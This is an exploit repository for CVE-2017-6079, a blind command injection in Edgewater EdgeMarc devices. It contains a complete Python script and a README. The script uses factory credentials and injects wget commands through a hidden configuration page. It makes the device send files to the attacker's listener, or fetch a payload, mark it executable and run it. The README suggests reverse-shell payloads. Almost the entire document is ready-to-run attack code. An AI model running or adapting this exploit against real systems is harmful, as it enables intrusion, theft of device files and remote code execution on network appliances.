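#!/usr/bin/env python3
"""Edgewater EdgeMarc blind command injection (CVE-2017-6079).

Developed from the technical description by depthsecurity:
https://depthsecurity.com/blog/cve-2017-6079-blind-command-injection-in-edgewater-edgemarc-devices

The HTTP web-management application on Edgewater Networks EdgeMarc
appliances has a hidden page that lets "user-defined commands" (meant for
things such as specific iptables routes) be set.  The page is effectively
a web shell: if a command is valid it executes, but the client gets no
output back.  It has been confirmed in firmware as old as 2006.

This script turns the blind injection into a file read or a payload
upload-and-execute by making the target run ``wget`` against an HTTP
listener that the script itself starts on the attacker host:

  read    the target POSTs the requested device file to the listener and
          the raw bytes are written to stdout;
  upload  the target fetches a local file from the listener into
          /tmp/<random name>, then a second injection chmods and runs it.

Operational notes:
  * Everything travels over plain HTTP: the device credentials (Basic
    auth) and the exfiltrated file are visible to anyone on the path.
  * The listener binds all interfaces on TCP/80 (the injected wget URL
    carries no port), so the script needs the privilege to bind port 80
    and the device must be able to reach AttackerIP on that port.  The
    listener only ever serves the one payload file named on the command
    line, never the working directory.
  * The factory credentials root/default are used unless a ``user:pass``
    pair is given as the last argument.

Ported from the Python 2 original (``thread``/``BaseHTTPServer``) to
Python 3 standard library only; ``requests`` is no longer needed.
"""
import base64
import os
import secrets
import shlex
import string
import sys
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'

# EdgeMarc factory credentials; the original exploit hard-coded the
# resulting header value "Basic cm9vdDpkZWZhdWx0".
DEFAULT_USER = "root"
DEFAULT_PASS = "default"

# Port the injected wget commands connect back to.  The URL built by
# callback_url() omits the port when it is 80, as the original did.
LISTEN_PORT = 80

# How long main() waits for the device to connect back before giving up.
# The injection is blind, so a missing callback is the only failure signal.
CALLBACK_TIMEOUT = 120

# Hidden "user defined commands" page; every mode POSTs to it.
CONFIG_PAGE = "/cgi-bin/config?page=50&form=mainForm"

# The single local file the listener may serve (upload mode).  Set by
# main(); None means "serve nothing".
served_file = None
# Signalled by the handler once the target has connected back.
data_received = threading.Event()
# True when that callback actually delivered/received the data.
callback_ok = False
# Random /tmp file name used for the uploaded payload on the device.
payload_name = None
# The HTTPServer instance started by listener().
server = None


class RequestHandler(BaseHTTPRequestHandler):
    """Handles the device's wget connections to our listener.

    GET  (upload mode) serves ``served_file`` and nothing else: any other
         path, including traversal attempts, gets a 404.  The listener is
         bound on all interfaces, so it must not double as a file server
         for the attacker's working directory.
    POST (read mode) receives the file contents the device posts with
         ``wget --post-file`` and writes them raw to stdout.

    Nothing authenticates the peer; the client address is printed so the
    operator can tell the target apart from a stray scanner.
    """

    def do_GET(self):
        """Serve the expected payload file, refuse everything else."""
        global callback_ok
        requested = os.path.basename(
            urllib.parse.unquote(urllib.parse.urlsplit(self.path).path))
        print(OKGREEN + "[#] %s connected, GET %s" % (self.client_address[0], self.path) + ENDC)

        if served_file is None or requested != os.path.basename(served_file):
            print(FAIL + "[!] Refusing to serve '%s' (only %r is offered)" % (requested, served_file) + ENDC)
            self.send_error(404)
            return

        try:
            with open(served_file, 'rb') as fh:
                body = fh.read()
        except OSError as exc:
            # Our own file vanished or is unreadable: end the wait, but
            # make sure main() does not go on to execute a missing payload.
            print(FAIL + "[!] Cannot read %s: %s" % (served_file, exc) + ENDC)
            self.send_error(404)
            callback_ok = False
            data_received.set()
            return

        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)
        print(OKGREEN + "[#] Sent %d bytes of %s" % (len(body), served_file) + ENDC)
        callback_ok = True
        data_received.set()

    def do_POST(self):
        """Dump the posted file contents (read mode) to stdout."""
        global callback_ok
        try:
            length = int(self.headers.get('Content-Length') or 0)
        except ValueError:
            length = 0
        body = self.rfile.read(length)

        print(OKGREEN + "[#] Output received from %s (%d bytes)" % (self.client_address[0], length) + ENDC)
        sys.stdout.flush()
        # Raw bytes: the file may be binary or not UTF-8.
        sys.stdout.buffer.write(body)
        sys.stdout.buffer.flush()
        print(ENDC)

        # Python 3's BaseHTTPRequestHandler buffers the status line until
        # end_headers(); without it the device never gets a response.
        self.send_response(200)
        self.send_header('Content-Length', '0')
        self.end_headers()
        callback_ok = True
        data_received.set()

    def log_request(self, code='-', size='-'):
        """Silence the default per-request access log."""
        pass


def listener(port=LISTEN_PORT):
    """Bind the callback server on all interfaces and serve it in a daemon thread.

    Binding happens in the caller's thread so that a failure (typically
    EACCES on port 80 without root/CAP_NET_BIND_SERVICE) raises OSError
    there, instead of killing a background thread while main() waits for
    a callback that can never come.  Returns the HTTPServer, also stored
    in the module global ``server``.
    """
    global server
    server = HTTPServer(('', port), RequestHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def basic_auth(user=DEFAULT_USER, password=DEFAULT_PASS):
    """Return the HTTP Basic ``Authorization`` header for ``user:password``.

    With the defaults this is ``Basic cm9vdDpkZWZhdWx0``.
    """
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    return {"Authorization": "Basic " + token}


def build_payload(commands):
    """Form fields for the hidden config page that make it run ``commands``.

    ``commands`` goes verbatim into ``udefsEntries`` (one shell command per
    line); ``applyConfig=1`` makes the device apply, and so execute, them.
    """
    return {
        "mainFormSubmitAction": "",
        "udefsEntries": commands,
        "applyConfig": "1",
        "saveConfig": "",
    }


def inject(TargetIP, commands, auth=None, timeout=60):
    """POST ``commands`` to the target's hidden config page.

    Returns the HTTP status code, or None when no response was obtained.
    The injection is blind: a 200 only means the form was accepted, not
    that the commands ran.  A 401 means the Basic credentials were
    rejected (the device is not on root/default).
    """
    url = "http://%s%s" % (TargetIP, CONFIG_PAGE)
    data = urllib.parse.urlencode(build_payload(commands)).encode()
    req = urllib.request.Request(url, data=data, headers=auth or basic_auth(), method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        print(FAIL + "[!] Target answered HTTP %d (401 = credentials rejected)" % exc.code + ENDC)
        return exc.code
    except (urllib.error.URLError, OSError) as exc:
        print(FAIL + "[!] Request to %s failed: %s" % (TargetIP, exc) + ENDC)
        return None


def callback_url(AttackerIP, port=LISTEN_PORT, path=""):
    """URL the device's wget uses to reach our listener.

    The port is only written when it is not 80, and ``path`` is
    percent-encoded; with the defaults the result is byte-identical to
    the URLs the original exploit built.
    """
    host = AttackerIP if port == 80 else "%s:%d" % (AttackerIP, port)
    if path:
        return "http://%s/%s" % (host, urllib.parse.quote(path))
    return "http://%s" % host


def read_command(FilePath, url):
    """Shell command that POSTs the device file ``FilePath`` to ``url``."""
    return "wget --post-file %s %s" % (shlex.quote(FilePath), url)


def upload_command(name, url):
    """Shell command that fetches ``url`` into /tmp/``name`` on the device."""
    return "wget -O /tmp/%s %s" % (name, shlex.quote(url))


def execute_command(name):
    """Shell commands that make /tmp/``name`` executable and run it."""
    return "chmod 755 /tmp/%s\n/tmp/%s" % (name, name)


def read_file(TargetIP, AttackerIP, FilePath, auth=None, port=LISTEN_PORT):
    """Make the device POST ``FilePath`` (a path on the device) to our listener.

    Returns the status of the injection request (see inject()).  The file
    itself arrives later, through RequestHandler.do_POST.
    """
    print(OKBLUE + "[*] Reading '%s'" % FilePath + ENDC)
    return inject(TargetIP, read_command(FilePath, callback_url(AttackerIP, port)), auth)


def upload_file(TargetIP, AttackerIP, FileName, auth=None, port=LISTEN_PORT):
    """Make the device fetch ``FileName`` from our listener into /tmp/<random>.

    Sets the module global ``payload_name`` used by execute_payload().
    ``FileName`` must match the basename of the file the listener serves
    (``served_file``), otherwise the handler refuses the request.
    """
    global payload_name
    payload_name = ''.join(secrets.choice(string.ascii_uppercase) for _ in range(5))
    print(OKBLUE + "[*] Forcing the target to connect to us" + ENDC)
    return inject(TargetIP, upload_command(payload_name, callback_url(AttackerIP, port, FileName)), auth)


def execute_payload(TargetIP, auth=None):
    """Run the payload uploaded by upload_file().

    Raises RuntimeError when called before upload_file() picked a name.
    """
    if payload_name is None:
        raise RuntimeError("execute_payload() called before upload_file()")
    return inject(TargetIP, execute_command(payload_name), auth)


BANNER = r"""
 _____    _                           _
| ____|__| | __ _  _____      ____ _| |_ ___ _ __
|  _| / _` |/ _` |/ _ \ \ /\ / / _` | __/ _ \ '__|
| |__| (_| | (_| |  __/\ V  V / (_| | ||  __/ |
|_____\__,_|\__, |\___| \_/\_/ \__,_|\__\___|_|
            |___/
 _____    _
| ____|__| | __ _  ___ _ __ ___   __ _ _ __ ___
|  _| / _` |/ _` |/ _ \ '_ ` _ \ / _` | '__/ __|
| |__| (_| | (_| |  __/ | | | | | (_| | | | (__
|_____\__,_|\__, |\___|_| |_| |_|\__,_|_|  \___|
            |___/
 _____            _       _ _
| ____|_  ___ __ | | ___ (_) |_
|  _| \ \/ / '_ \| |/ _ \| | __|
| |___ >  <| |_) | | (_) | | |_
|_____/_/\_\ .__/|_|\___/|_|\__|
           |_|


Edgewater Edgemarc Exploit CVE-2017-6079
Coded By: Mostafa Soliman"""


def print_banner():
    """Print the tool banner in red."""
    print(FAIL + BANNER + ENDC)


def usage():
    """Print the command-line synopsis and exit with status 1."""
    print("""
[USAGE] %s [operation] [TargetIP] [AttackerIP] [FilePath] [user:pass]
    operation:  Either read / upload
    TargetIP:   IP address of the target running the Edgewater Edgemarc web server
    AttackerIP: IP address the device connects back to (TCP/%d, must be reachable from the device)
    FilePath:   Remote file to download in case of "read" operation
                Local file to upload in case of "upload" operation
    user:pass   Optional web-management credentials (default %s:%s)
""" % (sys.argv[0], LISTEN_PORT, DEFAULT_USER, DEFAULT_PASS))
    sys.exit(1)


def main():
    """CLI entry point: parse argv, start the listener, run one mode.

    Exits 1 on bad arguments, a missing local payload, a listener bind
    failure, a failed/401 injection request, or no callback from the
    device within CALLBACK_TIMEOUT seconds.
    """
    global served_file
    print_banner()

    argv = sys.argv[1:]
    if len(argv) not in (4, 5):
        usage()
    operation, TargetIP, AttackerIP, FilePath = argv[:4]
    operation = operation.lower()
    if operation not in ("read", "upload"):
        print(FAIL + "Wrong Operation" + ENDC)
        usage()

    auth = basic_auth()
    if len(argv) == 5:
        user, sep, password = argv[4].partition(":")
        if not sep:
            print(FAIL + "Credentials must be given as user:pass" + ENDC)
            usage()
        auth = basic_auth(user, password)

    if operation == "upload":
        # Check up front; the original only noticed a missing file once
        # the device was already connecting back.
        if not os.path.isfile(FilePath):
            print(FAIL + "[!] Local payload '%s' not found" % FilePath + ENDC)
            sys.exit(1)
        served_file = FilePath

    try:
        listener(LISTEN_PORT)
    except OSError as exc:
        print(FAIL + "[!] Cannot listen on TCP/%d: %s (port 80 needs root or CAP_NET_BIND_SERVICE)" % (LISTEN_PORT, exc) + ENDC)
        sys.exit(1)

    try:
        if operation == "read":
            status = read_file(TargetIP, AttackerIP, FilePath, auth=auth)
        else:
            status = upload_file(TargetIP, AttackerIP, os.path.basename(FilePath), auth=auth)
        if status is None or status == 401:
            sys.exit(1)

        print(OKBLUE + "[*] Waiting up to %ds for the target to connect back" % CALLBACK_TIMEOUT + ENDC)
        if not data_received.wait(CALLBACK_TIMEOUT):
            print(FAIL + "[!] No callback from the target. Is %s reachable from the device on TCP/%d?" % (AttackerIP, LISTEN_PORT) + ENDC)
            sys.exit(1)
    finally:
        server.shutdown()
        server.server_close()

    if operation == "upload":
        if not callback_ok:
            sys.exit(1)
        print("[#] Executing The Payload" + ENDC)
        execute_payload(TargetIP, auth=auth)


if __name__ == "__main__":
    main()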
11 | 12 | Device Detection 13 | =============== 14 | Nmap identifies the device from its web server banner, as shown below. 15 | ![Alt text](pics/nmap.png?raw=true "nmap") 16 | 17 | 18 | Usage 19 | ====== 20 | ``` 21 | _____ _ _ 22 | | ____|__| | __ _ _____ ____ _| |_ ___ _ __ 23 | | _| / _` |/ _` |/ _ \ \ /\ / / _` | __/ _ \ '__| 24 | | |__| (_| | (_| | __/\ V V / (_| | || __/ | 25 | |_____\__,_|\__, |\___| \_/\_/ \__,_|\__\___|_| 26 | |___/ 27 | _____ _ 28 | | ____|__| | __ _ ___ _ __ ___ __ _ _ __ ___ 29 | | _| / _` |/ _` |/ _ \ '_ ` _ \ / _` | '__/ __| 30 | | |__| (_| | (_| | __/ | | | | | (_| | | | (__ 31 | |_____\__,_|\__, |\___|_| |_| |_|\__,_|_| \___| 32 | |___/ 33 | _____ _ _ _ 34 | | ____|_ ___ __ | | ___ (_) |_ 35 | | _| \ \/ / '_ \| |/ _ \| | __| 36 | | |___ > <| |_) | | (_) | | |_ 37 | |_____/_/\_\ .__/|_|\___/|_|\__| 38 | |_| 39 | 40 | 41 | Edgewater Edgemarc Exploit CVE-2017-6079 42 | Coded By: Mostafa Soliman 43 | 44 | [USAGE] CVE-2017-6079.py [operation] [TargetIP] [AttackerIP] [FilePath] 45 | operation: Either read / upload 46 | AttackerIP: IP address to receive the connection on 47 | TargetIP: IP address of the target running Edgewater Edgemarc server 48 | FilePath: Remote file to download in case of "read" operation 49 | Local file to upload in case of "upload" operation 50 | ``` 51 | 52 | Exploit 53 | ======== 54 | The exploit assumes the device still has the factory root password, ```default```. If it does not, the Basic ```Authorization``` header the script sends must be changed to the real credentials. Note that the script starts its own HTTP listener on TCP port 80 of the attacker host (binding port 80 normally requires root), and the device must be able to reach ```AttackerIP``` on that port; the injection is blind, so a device that cannot connect back simply produces no output. Both the credentials and the transferred file travel over plain HTTP. 55 | The exploit has 2 modes of operation: 56 | #### 1. Read 57 | This mode makes the device POST the contents of the requested file back to the script's HTTP listener, which prints them. 58 | 59 | ![Alt text](pics/read-exploit.png?raw=true "read") 60 | 61 | 62 | #### 2. Upload 63 | This mode makes the device fetch an ELF payload (built for the appliance's architecture) from the script's HTTP listener into the ```/tmp/``` folder, then marks it executable and runs it. 64 | The HTTP listener that serves the payload is started by the script itself; if the payload connects back (for example a reverse shell), start the listener for that connection beforehand.
65 | 66 | ![Alt text](pics/upload-exploit.png?raw=true "upload") 67 | 68 | -------------------------------------------------------------------------------- /pics/README.md: -------------------------------------------------------------------------------- 1 | pics 2 | -------------------------------------------------------------------------------- /pics/nmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit/7f2076033693d850fef3d29bb23cb9be0f6cf4ee/pics/nmap.png -------------------------------------------------------------------------------- /pics/read-exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit/7f2076033693d850fef3d29bb23cb9be0f6cf4ee/pics/read-exploit.png -------------------------------------------------------------------------------- /pics/upload-exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit/7f2076033693d850fef3d29bb23cb9be0f6cf4ee/pics/upload-exploit.png --------------------------------------------------------------------------------